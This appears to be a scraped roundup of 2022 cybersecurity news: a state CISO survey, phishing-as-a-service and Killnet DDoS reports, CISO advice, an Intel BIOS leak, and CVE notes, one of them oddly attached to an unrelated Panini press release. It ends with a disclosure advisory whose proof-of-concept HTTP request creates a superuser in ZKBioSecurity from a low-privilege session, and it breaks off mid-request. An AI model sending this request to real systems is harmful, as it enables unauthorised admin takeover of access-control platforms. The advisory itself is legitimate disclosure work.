LOUISVILLE, Ky., Oct. 11, 2022 /PRNewswire/ — Deloitte and the National Association of State Chief Information Officers (NASCIO) today released their 2022 Cybersecurity Study, "State Cybersecurity in a Heightened Risk Environment." The survey captures responses from chief information security officers (CISOs) in all 50 states and three territories about current cybersecurity trends, challenges and opportunities.

The survey found that state CISOs throughout the U.S. gained considerable strength and authority over the past few years, as they rapidly migrated government operations and services to a virtual environment and expedited digital transformations to meet the immediate needs of individuals and families. Due to the dedicated efforts of these CISOs, state agencies were able to continue providing high-quality service to their constituents, despite the challenges imposed by a global pandemic.  

Additional highlights from the 2022 Deloitte/NASCIO survey include:

*   **Addressing the talent gap**: In 2022, the demand for high-skilled workers has grown even more acute for public and private sector employers. In this environment, the lack of cybersecurity professionals and other staff remains among the top five barriers cited by state CISOs.
    *   Despite CISOs' growing responsibilities and the increasing sophistication of both technology and threats, **headcounts for state cybersecurity professionals remain about the same as in 2020, and more than 6 in 10 CISOs report gaps in competencies among their staffs**.
*   **Embracing the entire state**: It is an imperative to provide for greater security across the entire state through a tighter collaboration with local governments and state higher education institutions. CISOs made significant progress in enhancing their stature and visibility at the state executive and legislative levels, and they are continuing to get the institutional support and resources they need.
    *   All 50 states now have a CISO, and many are establishing new positions for chief privacy officers, chief risk officers and identity program directors.
    *   More state legislators are codifying the role of the CISO into state law and funding the position. They are also codifying several cyber initiatives into state law, such as enterprise risk management frameworks, cybersecurity legislative councils and cybersecurity training.
    *   More states now require CISOs to provide periodic reports to senior state officials, such as the governor, legislature and agency secretaries.
    *   CISOs are looking to establish and activate a shared security services approach to enable a whole-of-state approach to protecting local governments and public higher education institutions.
*   **Emerging technologies present new opportunities**: In the post-pandemic digital landscape, CISOs have an even more critical role to play in guiding the evaluation and implementation of new technologies.
    *   State CISOs confirm that many applications have migrated to the cloud. With remote work, digital and mobile platforms have become part of the fabric of daily life by which people work, communicate and transact.
    *   **States have taken a big step forward to provide digital identities for citizen services**. Capabilities, such as cloud computing, artificial intelligence and robotic process automation, enable states to further enhance digital modernization in service of their missions and constituents.

"The complexity of cyber challenges that the state CISOs tackle is increasing with the need to take a whole-of-state approach involving multiple jurisdictions and stakeholders," said Srini Subramanian, principal, Deloitte & Touche LLP, and Deloitte's global risk advisory leader for government and public services. "To address these challenges, state CISOs are increasingly laying the groundwork to adopt emerging technologies, promoting more collaboration with local government agencies and higher education institutions, upskilling state employees and transforming employment practices to attract the next-generation of highly capable cyber talent."

"State CISOs played critical roles helping the country successfully navigate the twists and turns of the pandemic, and this year's survey identifies the steps needed to grow this increasingly public role and meet the current and future challenges faced by state agencies," said Meredith Ward, director of policy and research at NASCIO and a co-author of the 2022 Deloitte/NASCIO Cybersecurity Study. "We're proud to again bring the perspectives of state CISOs to the forefront of conversations around cybersecurity."

Additional takeaways from the 2022 Deloitte/NASCIO survey include:

*   Thirty states increased their cybersecurity budgets from 2021 to 2022. And for the first time, CISOs report that a handful of states are allocating more than 10% of their IT budgets to cybersecurity, in alignment with federal government levels. However, most states still only allocate between 2% and 10% of their budgets to cybersecurity efforts.
*   Many state CISOs identified the drafting and implementation of the Zero Trust framework as a key initiative.
*   CISOs say that malware, ransomware and phishing attempts continue to present security challenges. Concern among CISOs about foreign state-sponsored espionage has also risen significantly, while the perceived threat from third parties and social engineering has declined.
*   CISOs found that the three leading causes of cyber incidents remain web applications, malicious code and financial fraud. However, CISOs note a rise in cyber incidents involving foreign state-sponsored espionage, zero-day attacks and attacks against cloud platforms.
*   Nearly one-third of state CISOs say that state agencies manage cyber incidents on their own, rather than working with a central state IT security group.
*   CISOs are increasingly contracting cybersecurity professionals and states are demonstrating more interest in outsourcing specific cybersecurity functions to managed service providers. In fact, more than half of CISOs report outsourcing security operations center tasks, which require 24x7 monitoring, and more than 60% of CISOs report having confidence in the cybersecurity services of third-party vendors.
*   State CISOs are starting to incorporate diversity, equity and inclusion (DEI) practices, such as designating a DEI leadership position or teams to foster a culture of inclusion. However, many CISOs say they do not know if they have such practices in place.

See here for the full survey results.

See here for learn more about Deloitte's cyber risk practice.

**About Deloitte**

Deloitte provides industry-leading audit, consulting, tax and advisory services to many of the world's most admired brands, including nearly 90% of the Fortune 500® and more than 7,000 private companies. Our people come together for the greater good and work across the industry sectors that drive and shape today's marketplace — delivering measurable and lasting results that help reinforce public trust in our capital markets, inspire clients to see challenges as opportunities to transform and thrive, and help lead the way toward a stronger economy and a healthier society. Deloitte is proud to be part of the largest global professional services network serving our clients in the markets that are most important to them. Building on more than 175 years of service, our network of member firms spans more than 150 countries and territories. Learn how Deloitte's approximately 415,000 people worldwide connect for impact at www.deloitte.com.

Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee ("DTTL"), its network of member firms, and their related entities. DTTL and each of its member firms are legally separate and independent entities. DTTL (also referred to as "Deloitte Global") does not provide services to clients. In the United States, Deloitte refers to one or more of the US member firms of DTTL, their related entities that operate using the "Deloitte" name in the United States and their respective affiliates. Certain services may not be available to attest clients under the rules and regulations of public accounting. Please see www.deloitte.com/about to learn more about our global network of member firms.

Cybersecurity Survey of State CISOs Identifies Many Positive Trends

Cyber criminals are using a previously undocumented phishing-as-a-service (PhaaS) toolkit called Caffeine to effectively scale up their attacks and distribute nefarious payloads.
"This platform has an intuitive interface and comes at a relatively low cost while providing a multitude of features and tools to its criminal clients to orchestrate and automate core elements of their phishing

Cyber criminals are using a previously undocumented phishing-as-a-service (PhaaS) toolkit called **Caffeine** to effectively scale up their attacks and distribute nefarious payloads.

"This platform has an intuitive interface and comes at a relatively low cost while providing a multitude of features and tools to its criminal clients to orchestrate and automate core elements of their phishing campaigns," Mandiant said in a new report.

Some of the core features offered by the platform comprise the ability to craft customized phishing kits, manage redirect pages, dynamically generate URLs that host the payloads, and track the success of the campaigns.

The development comes a little over a month after Resecurity took the wraps off another PhaaS service dubbed EvilProxy that's offered for sale on dark web criminal forums.

But unlike EvilProxy, whose operators are known to vet prospective customers before activating the subscriptions, Caffeine is notable for running an open registration process, effectively enabling anyone with an email address to sign up for the service.

This restriction-free approach not only obviates the need for approaching the actors on underground forums or requiring a referral from an existing user, but also allows Caffeine to rapidly expand its clientele and lower the barrier for entry.

Making it further stand apart from the rest, the PhaaS toolkit is noteworthy for offering phishing email templates for use against Chinese and Russian targets.

"Although the use of phishing platforms is certainly not a novel mechanism to facilitate attacks, it is worth noting that such feature-rich options, like Caffeine, are readily accessible to cybercriminals," the researchers said.

PhaaS services typically entail an operator to develop and deploy a significant chunk of the phishing campaigns, right from fake sign-in pages, website hosting, site templates, and credential theft.

The evolution of email-based phishing threats into a service-based economy means that adversaries who aim to conduct phishing attacks can now simply purchase such resources and infrastructure without having to work on it themselves. Caffeine is no exception.

It requires users to create an account, and buy a subscription that costs $250 a month (Basic), $450 for three months (Professional), or $850 for a six-month license (Enterprise) to avail its wide range of services, including the campaign management dashboard and the tools to configure the attacks.

The ultimate goal of the phishing campaign is to facilitate the theft of Microsoft 365 credentials through rogue sign-in pages hosted on legitimate WordPress sites, indicating that the Caffeine actors are leveraging compromised admin accounts, misconfigured websites, or flaws in web infrastructure platforms to deploy the kits.

While the login pages are currently limited to Microsoft 365 credential harvesting lures, the Google-owned threat intelligence firm noted that additional login page formats could be introduced in the future as per customer demands.

"It is also important to keep in mind that defensive measures against PhaaS attacks can be a game of cat and mouse," Mandiant said. "As quickly as threat actor infrastructure gets taken down, new infrastructure can be spun up."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Warn of New Phishing-as-a-Service Being Used by Cyber Criminals

Killnet calls on other groups to launch similar attacks against US civilian infrastructure, including marine terminals and logistics facilities, weather monitoring centers, and healthcare systems.

UPDATE 

Hot on the heels of attacks against US state government websites, pro-Russian threat group Killnet on Monday disrupted the websites of multiple US airports in a series of distributed denial-of-service (DDoS) attacks.

It also called on similarly aligned groups and individuals to carry out DDoS attacks on other US infrastructure targets, in what appears to be an escalation of a recent campaign protesting the US government's support for Ukraine in its war with Russia.

Airport websites that were affected by Killnet's DDoS attacks included Los Angeles International Airport (LAX), Chicago O'Hare, and the Hartsfield-Jackson Atlanta International Airport, among others. While the DDoS attacks made some of the sites inaccessible for several hours, they do not appear to have had any impact on airport operations.

Researchers from Mandiant who have been tracking the attacks said they observed a total of 15 US airport websites being impacted.

**Mostly Brief Interruptions**

In a statement to Dark Reading, airport authorities at LAX confirmed the attack.

"Early this morning, the FlyLAX.com website was partially disrupted," an LAX spokesperson noted in an emailed statement. LAX officials described the service interruption as being limited to portions of the public-facing FlyLAX.com website only. "No internal airport systems were compromised and there were no operational disruptions," according to the statement, adding that the airport's IT team has restored services and that the airport has notified the FBI and the Transportation Security Administration (TSA).

In an emailed statement to Dark Reading, the Chicago Department of Aviation (CDA) noted that its flychicago.com and related websites for O'Hare and Midway international airports went offline, but confirmed that airport operations were affected. 

"City of Chicago IT staff worked diligently to restore the website's functionality shortly after noon Central Time, and they continue to vigilantly monitor the situation," the statement said.

Ivan Righi, senior cyber threat intelligence analyst at Digital Shadows, says Killnet has also asked its supporters to join in on the airport attacks and posted a list of domains to be targeted on its Telegram channel. In total, the group mentioned 49 domains belonging to airports across the US, he says. Killnet's target list includes airports in some two dozen states including California, Delaware, Florida, Georgia, Illinois, Maryland, Massachusetts, and Michigan.

"At this time, it is unknown how successful these attacks were, but Killnet attacks are known to take websites down for short periods," Righi says. The attacks began with a DDoS attack on O'Hare, where the group stated its motivation to target US civilian network sector, which the group deemed to be not secure, he says.  

**Calls for Broader Attacks**

Vlad Cuiujuclu, team lead for global intel at Flashpoint, says the DDoS attack on O'Hare International Airport came shortly after Killnet announced new rounds of DDoS attacks against domains that belong to the civilian infrastructure of the United States. Among the targets it is urging supporters to attack are marine terminals and logistics facilities, weather monitoring centers, healthcare systems, ticketing systems for public transit, exchanges, and online trading systems, Cuiujuclu says.

Killnet's post urging other pro-Russian groups to launch DDoS attacks against domains that belong to the US civilian infrastructure was shared by other Russian-speaking cyber-collectives, including Anonymous | Russia, Phoenix, and We Are Clowns, Cuiujuclu noted.

Killnet has been among the more active pro-Russian cyberthreat groups in recent months. Just last week it claimed credit for DDoS attacks on the government websites of Mississippi, Kentucky, and Colorado. In July, the group claimed credit for a DDoS attack on the website of the US Congress, which briefly affected public access.

In August, Killnet said it planned to attack Lockheed Martin, the company manufacturing the US-made rocket launchers that the Ukrainian military has been using in the conflict. The group claimed it had compromised Lockheed Martin's identity authorization infrastructure, but Flashpoint, which tracked the campaign, said it was unable to find any verifiable evidence of the supposed attack. "This is possible, but Killnet has this far shown little verifiable evidence of this beyond a video and a spreadsheet allegedly containing employee data, the authenticity of which could not be determined," Flashpoint said at the time.

**An Especially Active Threat Actor**

Almost since the beginning of the Russian invasion of Ukraine, Killnet has been continuously posting alleged evidence of DDoS attacks against organizations in NATO member states and those it perceives as supporting Ukraine in the conflict. Flashpoint has previously described Killnet as a media-savvy threat group with a tendency to try to inflate its profile by bragging about attacks. "While Killnet’s threats are often grandiose and ambitious, the tangible effects of their recent DDoS attacks have so far appeared to be negligible."

Killnet's attacks — and those it is urging others to carry out — are examples of what security experts say is the tendency in recent years for geopolitical conflicts to spill over into the cyber domain. The threat group's apparent escalation of its campaign against US and other NATO countries, for instance, comes just days after an explosion destroyed a section of a critical bridge connecting Russia to the Crimean Peninsula.

So far, most of the cyberattacks by pro-Russian groups that impacted US organizations have not been nearly as disruptive as attacks by Russian groups against Ukrainian entities. Some of those attacks — including many going back to Russia's annexation of Crimea — were designed to destroy systems and degrade power and other critical infrastructure in support of Russian military objectives.

**_This story was updated at 11:30 a.m. ET to include a statement from the Chicago Department of Aviation, and to reflect that the Indianapolis airport was not affected._**

US Airports in Cyberattack Crosshairs for Pro-Russian Group Killnet

A CISO's responsibilities have evolved immensely in recent years, so their first three months on the job should look a different today than they might have several years ago.

Not too long ago, the role of chief information security officer was a purely technical position designed to help an organization overcome cybersecurity challenges. Today, however, the CISO role has evolved — growing both in responsibility and stature within a company. The CISO is now a critical member of the executive team, responsible for tying not only cybersecurity, but overall risk management, to the company's business strategy and operations.

The modern CISO is involved in strategic decision-making, for example, ensuring the business securely embraces digital transformation while assuring the board, clients, and investors that cyber capabilities and defenses are active and evolving with current threats. And they are responsible for leveraging people, processes, and technologies to enable their organization to fulfill its overarching business objectives securely.

Given this evolution in responsibilities, a CISO's first 90 days on the job should look a lot different today than it did even several years ago.

**The First 90 Days**

While many CISOs want to immediately demonstrate value by jumping in with big ideas and projects on day one, they will be able to make much more of a long-term impact if they first take the time to understand the company's mission, values, and business objectives. They also need to get up to speed on core activities, products, services, research and development, intellectual property, and merger and acquisition plans. And they need to understand all potential issues, previous breaches, regulatory or external obligations, and existing technical debt.

With this in mind, here are a few recommendations on what a CISO's focus should be during their first 90 days on the job.

**Gain An Understanding of the Organization's Larger Mission and Culture**

The very first day, begin to deploy a collection of interview and interrogation techniques with a goal of understanding the business, its purposes and its priorities. Interview your employees, midlevel business leaders, and customers to get a sense of all key stakeholders, initial pain points, and how mature the cybersecurity culture is within the organization. Finally, gently interrogate your partners, suppliers, and vendors to determine who is just selling and who is a trusted advisor. Going through this process will open lines of communication, uncover challenges, and help build a 90-day action plan and road map.

**Identify the Crown Jewels**

Determine which data and systems underpin the company's strategic mission and core competencies, represent intellectual property, differentiate the enterprise from its competitors, or support major customer segments or revenue lines. These crown jewels are the digital assets that are most likely to be targeted by threat actors, and thus must have their cyber-hygiene efforts accelerated. If the C-suite and board understand these critical areas, they can tell you their risk appetite, and you can implement security strategies accordingly.

**Develop a Plan Based on the Company's Current IT and Business Landscape**

Once assets are identified and prioritized, develop a written risk management plan with checklists for deliverables, structure and communication between key internal and external stakeholders. On this latter point, the CISO always must act as an information broker and as a partner to all the key organizational decision-makers. One effective way to do this is to establish formal and informal communication with these roles, so the organization can move forward strategically.

**Master the Basics**

There are many technologies needed to secure the modern company, but there are a few must-haves that should be implemented right away, if they aren't already. These are baseline controls, including vulnerability management and anti-malware defenses for the endpoint, and non-negotiable controls, including multifactor authentication, sensitive data encryption, application whitelisting, 24/7 security monitoring, file integrity monitoring, privileged access management, network segmentation, data loss prevention, and a rigorous assessment and audit function connected to vulnerability and patching strategies.

**Implement Benchmarks**

Prove the value of security plans, processes, and technologies to the C-suite, business unit executives, and the board by implementing benchmarks and maturity assessments that show how the company stacks up against competitors, how security strategies stack up against industry best practices and frameworks, and how security initiatives are enabling the business with secure operations.

**Always Treat Security as a Business Problem**

Security incidents can result in myriad consequences on the business, and conversely, strong security can help the business succeed in a secure fashion. This is why it's so important that IT and security teams always remain integrated with the business side of the organization. As part of this, ensure ongoing communication and collaboration between executive leaders, the board, and security leaders. When management understands the business risks posed by cybersecurity threats, they'll be more apt to pay attention and participate in security efforts.

At the end of the first 90 days, a CISO should be able to answer questions such as: How well protected is the organization? What is our capability maturity against industry standard frameworks? What are our most critical vulnerabilities and cyber-risk scenarios? What data is most important to the organization? What data risks could have the most significant negative impact on the organization? And what will it take to improve the organization's security posture, and do we have a road map?

While this may seem like a lot to get to the bottom of in a three-month timespan, following these six steps will set your company up for both short- and long-term security and business success.

6 Things Every CISO Should Do the First 90 Days on the Job

Categories: News
The blueprint aims to make AI less harmful to Americans by holding its creators accountable.



(Read more...)




The post White House unveils Blueprint for an AI Bill of Rights appeared first on Malwarebytes Labs.

On Tuesday, the Biden-Harris Administration's Office of Science and Technology Policy (OSTP) unveiled a new Blueprint for an AI Bill of Rights, which lists five principles to guide the design, use, and development of intelligence-based automated systems "to protect the American public in the age of artificial intelligence".

These principles focus on things that matter to Internet users: Protection from risky systems, protection from discrimination, data privacy, notice and explanation of AI use, and the option to opt out.

"Automated technologies are increasingly used to make everyday decisions affecting people's rights, opportunities, and access in everything from hiring and housing, to healthcare, education, and financial services," the White House said in a press release. It continued:

> While these technologies can drive great innovations, like enabling early cancer detection or helping farmers grow food more efficiently, studies have shown how AI can display opportunities unequally or embed bias and discrimination in decision-making processes. As a result, automated systems can replicate or deepen inequalities already present in society against ordinary people, underscoring the need for greater transparency, accountability, and privacy.

While the blueprint is for big tech companies, Dr. Alondra Nelson, deputy director for science and society in the OSTP, made clear it's also for every American who interacts with AI or whose life is affected by "unaccountable algorithms". 

In mid-September, the White House conducted a listening session on tech platform accountability wherein experts identified six concerns, each paired with a core principle for reform.

**AI prejudice**

Perhaps the most significant source of AI pain is algorithm discrimination. The descrimination stems from the fact that AIs are trained using training data sets rather than programmed. Gaps or biases in the training data inform the way that AI evaluates data in the real world.

As a result, the human prejudices some hoped AI would eliminate are sometimes baked right in. There are AI's that can't understand certain accents, others have prevented African Americans from getting kidney transplants, and some just don't think women can be computer programmers.

Although failings in AI are generally unintentional, their effects on marginalized populations can be real and severe.

**Just the first step**

While many organizations, such as the Center for Democracy and Technology (CDT), the American Civil Liberties Union (ACLU), and Access Now, have welcomed the government's Blueprint for the AI Bill of Rights, some say it shouldn't end here.

"This is clearly a starting point. That doesn't end the discussion over how the US implements human-centric and trustworthy AI," Marc Rotenberg, head of the Center for AI and Digital Policy (CAIDP), told Technology Review. "But it is a very good starting point to move the US to a place where it can carry forward on that commitment."

He also wants to see the US implement "checks and balances to AI uses that have the most potential to cause harm to humans", such as those in the EU's upcoming AI Act.

"We'd like to see some clear prohibitions on AI deployments that have been most controversial, which include, for example, the use of facial recognition for mass surveillance," Rotenberg said. 

Director of Policy for Stanford Institute for Human-Centered, AI Russell Wald, thinks the blueprint lacks details or mechanisms for enforcement. "It is disheartening to see the lack of coherent federal policy to tackle desperately needed challenges posed by AI, such as federally coordinated monitoring, auditing, and reviewing actions to mitigate the risks and harm brought by deployed or open-source foundation models," he said.

Sneha Revanur, founder and president of Encode Justice, an organization focusing on the youth and AI, also sees that flaw but has high hopes: "Though it is limited in its ability to address the harms of the private sector, the AI Bill of Rights can live up to its promise if it is enforced meaningfully, and we hope that regulation with real teeth will follow suit," she said.

White House unveils Blueprint for an AI Bill of Rights

Chipmaker Intel has confirmed that proprietary source code related to its Alder Lake CPUs has been leaked, following its release by an unknown third-party on 4chan and GitHub last week.
The published content contains Unified Extensible Firmware Interface (UEFI) code for Alder Lake, the company's 12th generation processors that was originally launched in November 2021.
In a statement shared with

Chipmaker Intel has confirmed that proprietary source code related to its Alder Lake CPUs has been leaked, following its release by an unknown third-party on 4chan and GitHub last week.

The published content contains Unified Extensible Firmware Interface (UEFI) code for Alder Lake, the company's 12th generation processors that was originally launched in November 2021.

In a statement shared with Tom's Hardware, Intel said the leak doesn't expose "any new security vulnerabilities as we do not rely on obfuscation of information as a security measure."

It's also encouraging the broader security research community to report any potential issues through its bug bounty program, adding it's reaching out to customers to notify them of the matter.

Besides the UEFI code, the leaked data dump includes a plethora of files and tools, some of which appear to come from firmware vendor Insyde Software.

Exact details surrounding the nature of the hack, including its provenance, are unclear. The GitHub repository has since been taken down, although it remains accessible via other replicated versions.

That said, indications are that the repository had been created by an employee of LC Future Center, a Chinese manufacturer of computers and laptops.

Earlier this February, the LAPSUS$ extortionist group breached NVIDIA, siphoning 1TB of sensitive data. The threat actor later claimed that the company had launched a retaliatory ransomware strike to prevent the release of the stolen data.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Intel Confirms Leak of Alder Lake BIOS Source Code

About 1 in 5 phishing email messages reach workers' inboxes, as attackers get better at dodging Microsoft's platform defenses and defenders run into processing limitations.

This week's report that cyberattackers are laser-focused on crafting attacks specialized to bypass Microsoft's default security showcases an alarming evolution in phishing tactics, security experts said this week.

Threat actors are getting better at slipping phishing attacks through the weak spots in platform email defenses, using a variety of techniques, such as zero-point font obfuscation, hiding behind cloud-messaging services, and delaying payload activation, for instance. They're also doing more targeting and research on victims.

As a result, nearly 1 in 5 phishing emails (18.8%) bypassed Microsoft's platform defenses and landed in workers' inboxes in 2022, a rate that increased 74% compared to 2020, according to research published on Oct. 6 by cybersecurity firm Check Point Software. Attackers increasingly used techniques to pass security checks, such as Sender Policy Framework (SPF), and obfuscate functional components of an e-mail, such as using zero-size fonts or hiding malicious URLs from analysis.

The increasing capabilities of attackers is due to the better understanding of current defenses, says Gil Friedrich, vice president of email security at Avanan, an email security firm acquired by Check Point in August 2021.

"It is a family of 10 to 20 techniques, but they all lead to the objective of deceiving a company's security layers," he says. "The end result is always an email that looks genuine to the recipient but looks different to the algorithm that analyzes the content."

Microsoft declined to comment on the research. However, the company has warned of advanced techniques, such as adversary-in-the-middle phishing (AiTM), which uses a custom URL to place a proxy server between a victim and their desired site, allowing the attacker to capture sensitive data, such as usernames and passwords. In July, the company warned that more than 10,000 organizations had been targeted during one AiTM campaign.

Check Point is not the only vendor to warn that phishing attacks are getting better. In a survey, email security firm Proofpoint found that 83% of organizations experienced a successful email-based phishing attack, nearly half again as many as suffered such an attack in 2020. Cybersecurity firm Trend Micro saw the number of phishing attacks more than double, growing 137% in the first half of 2022 compared to the same period in 2021, according to the firm's 2022 Mid-year Cybersecurity report.

Meanwhile, cybercriminals services, such as phishing-as-a-service and malware-as-a-service, are encapsulating the most successful techniques into easy-to-use offerings. In a survey of penetration testers and red teams, nearly half (49%) considered phishing and social engineering to be the attack techniques with the best return on investment.

**Research & Recon Inform Phishing**

Attackers are improving too because of the effort that cyberattackers make in collecting intel for targeting victims with social engineering. For one, they're utilizing the vast amounts of information that can be harvested online, says Jon Clay, vice president of threat intelligence for cybersecurity firm Trend Micro.

"The actors investigate their victims using open source intelligence to obtain lots of information about their victim \[and\] craft very realistic phishing emails to get them to click a URL, open an attachment, or simply do what the email tells them to do, like in the case of business e-mail compromise (BEC) attacks," he says.

The data suggests that attackers are also getting better at analyzing defensive technologies and determining their limitations. To get around systems that detect malicious URLs, for example, cybercriminals are increasingly using dynamic websites that may appear legitimate when an email is sent at 2 a.m., for example, but will present a different site at 8 a.m., when the worker opens the message.

**Improvements in Defense**

Such techniques not only deceive, but take advantage of asymmetries in defending versus attacking. Scanning every URL sent in an email is not a scalable defense, says Check Point's Friedrich. Running URLs in a full sandbox, analyzing the links to a specific depth, and using image processing to determine sites that are trying to mimic a brand requires a lot of computational power.

Instead, email security firms are deploying "click-time" analysis to tackle the problem.

"There are some algorithms or tests that you can't run on every URL, because the compute is huge, it eventually become price prohibited," he says. "Doing that at click time, we only need to do the tests on the URLs that users actually click on, which is a fraction, so 1% of the total links in e-mail."

In addition, defenses increasing rely on machine learning and artificial intelligence to classify malicious URLs and files in ways that rules-based systems cannot, says Trend Micro's Clay.

"Dealing with weaponized attachments can be difficult for those security controls that still rely on signatures only and don’t have advanced technologies that can scan the file using ML or a sandbox, both of which could detect many of these malware files," he says.

In addition, previous statements from Microsoft have noted that Office 365 includes many of the email protection capabilities discussed by other vendors, including protection from impersonation, visibility into attack campaigns, and using advanced heuristics and machine learning to recognize phishing attacks affecting an entire organization or industry.

Email Defenses Under Siege: Phishing Attacks Dramatically Improve

Why bother with new tactics and exploits when the old tricks are still effective?

Cybercriminals targeting the retail and hospitality industry are sticking to tried and tested threat vectors, such as credential harvesting and phishing, according to analysis by the Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC).

An ISAC is an industry-specific organization that acts as a centralized repository of information on threats affecting a specific industry sector. Member organizations share threat intelligence and mitigation information, with the idea that organizations can prepare their defenses better if they know the kinds of attacks their peers are experiencing.

The "RH-ISAC Intelligence Trends Summary," which encompasses information shared by member organizations from May to August, highlights shifts in the threat landscape for the retail, hospitality, and travel sectors. Credential harvesting was "by far the most prevalent reported threat," at 63%, according to the report. Suspicious domains were the second most prevalent, at 16%. Other threat indicators reported by members include malicious domains (3%), botnets (3%), and adversary-in-the-middle attacks (4%).

Ten malware families made up 81% of total reports the RH-ISAC tracked during the four-month period, of which Emotet was the most prevalent. While it's possible that the rise in Emotet-related reports could be connected to member organizations' focusing more on Emotet defense, it also suggests that Emotet activity is "once again steady after the group's reemergence earlier this year," the report says.

RH-ISAC isn't just about reporting threat indicators — member organizations also share information about specific threat topics. The "Top Sharing Trends" graph is an indicator of what kinds of threats organizations are most concerned about.

    

Credential harvesting remains the most common threat shared by members, at 43%, followed by phishing, at 16%. Information about malware attacks — namely Agent Tesla, Formbook, and Emotet — made up 31% of the threats shared by members.

The "Top Sharing Trends" graph outlines the frequency of sharing regarding a threat topic, while the "Top Reported Trends" graph shows the volume of threat indicators shared related to a given topic, according to RH-ISAC.

Credential Harvesting Is Retail Industry's Top Threat

Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file.

Panini, a global payments technology leader, officially announced that its Everest solution architecture that integrates computing platforms with check capture, was recently fully patented in the United States. This newly established approach is ground-breaking and further substantiates Panini as a visionary in payments technology.

Panini’s Everest unleashes the full power of Panini scanning platforms while dramatically removing the cost and complexity of integration, deployment and support for its customers and partners. Check scanning devices developed with this new technology can be used in different settings and even shared among users, making the move from Branch Image Capture (BIC) to Teller Image Capture (TIC) more attractive to financial institutions and aligning with the “bank of the future” trend of empowering roaming universal bankers in an open lobby environment. Not only will Everest offer more solution options for bank branches, but it will make Remote Deposit Capture (RDC) applications more flexible and easier to deploy and support: new devices like Panini’s EverneXt™ (up to 160 documents per minute) and mI:Deal™ (single feed) can easily be operated by a smart phone, tablet, or computer, with no need to download an API and keep it up-to-date over time. 

The Everest technology integrated into Panini scanning platforms enables the capture devices to be connected to any computing platform (such as tablets, PCs, smartphones, and POS terminals) via a choice of wired or wireless interfaces (Wi-Fi, Ethernet, USB), while replacing the traditional complexity of integration via API (application programming interface) with a state-of-the-art, secure HTTPS communications protocol. This architecture is the next decisive step in the evolution of Panini platforms designed to write the next chapter of paper-based payments dematerialization.

“Panini’s Everest-enabled intelligent scanning platforms open new possibilities for our customers and partners including on-board applications, shared devices, and untethered operation”, said Michael Pratt, Chief Executive Officer at Panini.

On October 4, 2016, the United States Patent and Trademark Office (USPTO) assigned Patent number 9,460,427 to the Everest technology, which builds on decades of Panini’s experience as a global leader in payments capture and displays yet another differentiator in the market. Panini thus continues to prove they operate as a dynamic and innovative organization delivering breakthrough, game-changing solutions.

**About Panini**  
Founded in Turin, Italy, Panini has enabled clients to capitalize on shifts in the global payments processing market for more than seventy years. Panini has a rich history of technology innovation, leveraging the company’s expertise in research & development. Panini’s market leading solutions are based on state-of-the-art engineering resources and ISO-9001 quality certified production. Panini offers check capture solutions that enable customers to fully realize the advantages and efficiencies available with the digital transformation of the paper check, resulting in the world’s largest deployed base of check capture systems, now approaching one million devices. Panini’s scalable check capture solutions address the complete range of distributed check processing opportunities including teller capture, back-counter capture, remote deposit capture, remittance processing and point-of-sale capture. The company provides solutions on a global basis, and has direct subsidiary operations in the United States covering North America and in Brazil covering Latin American markets. For more information visit: www.panini.com.

*   Português
*   Español
*   Italiano

CVE-2022-39959: Panini Patents Revolutionary New “Everest” Architecture

An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.

**Full Disclosure mailing list archives**

_From_: Caio B <caioburgardt () gmail com>  
_Date_: Thu, 29 Sep 2022 11:20:39 -0300  

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0\_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base\_index.action

Cookie: <INSERT\_LOW-PRIVILEGE\_COOKIE\_HERE>

Upgrade-Insecure-Requests: 1





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"





test\_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"





-----------------------------291763244192371568695079347

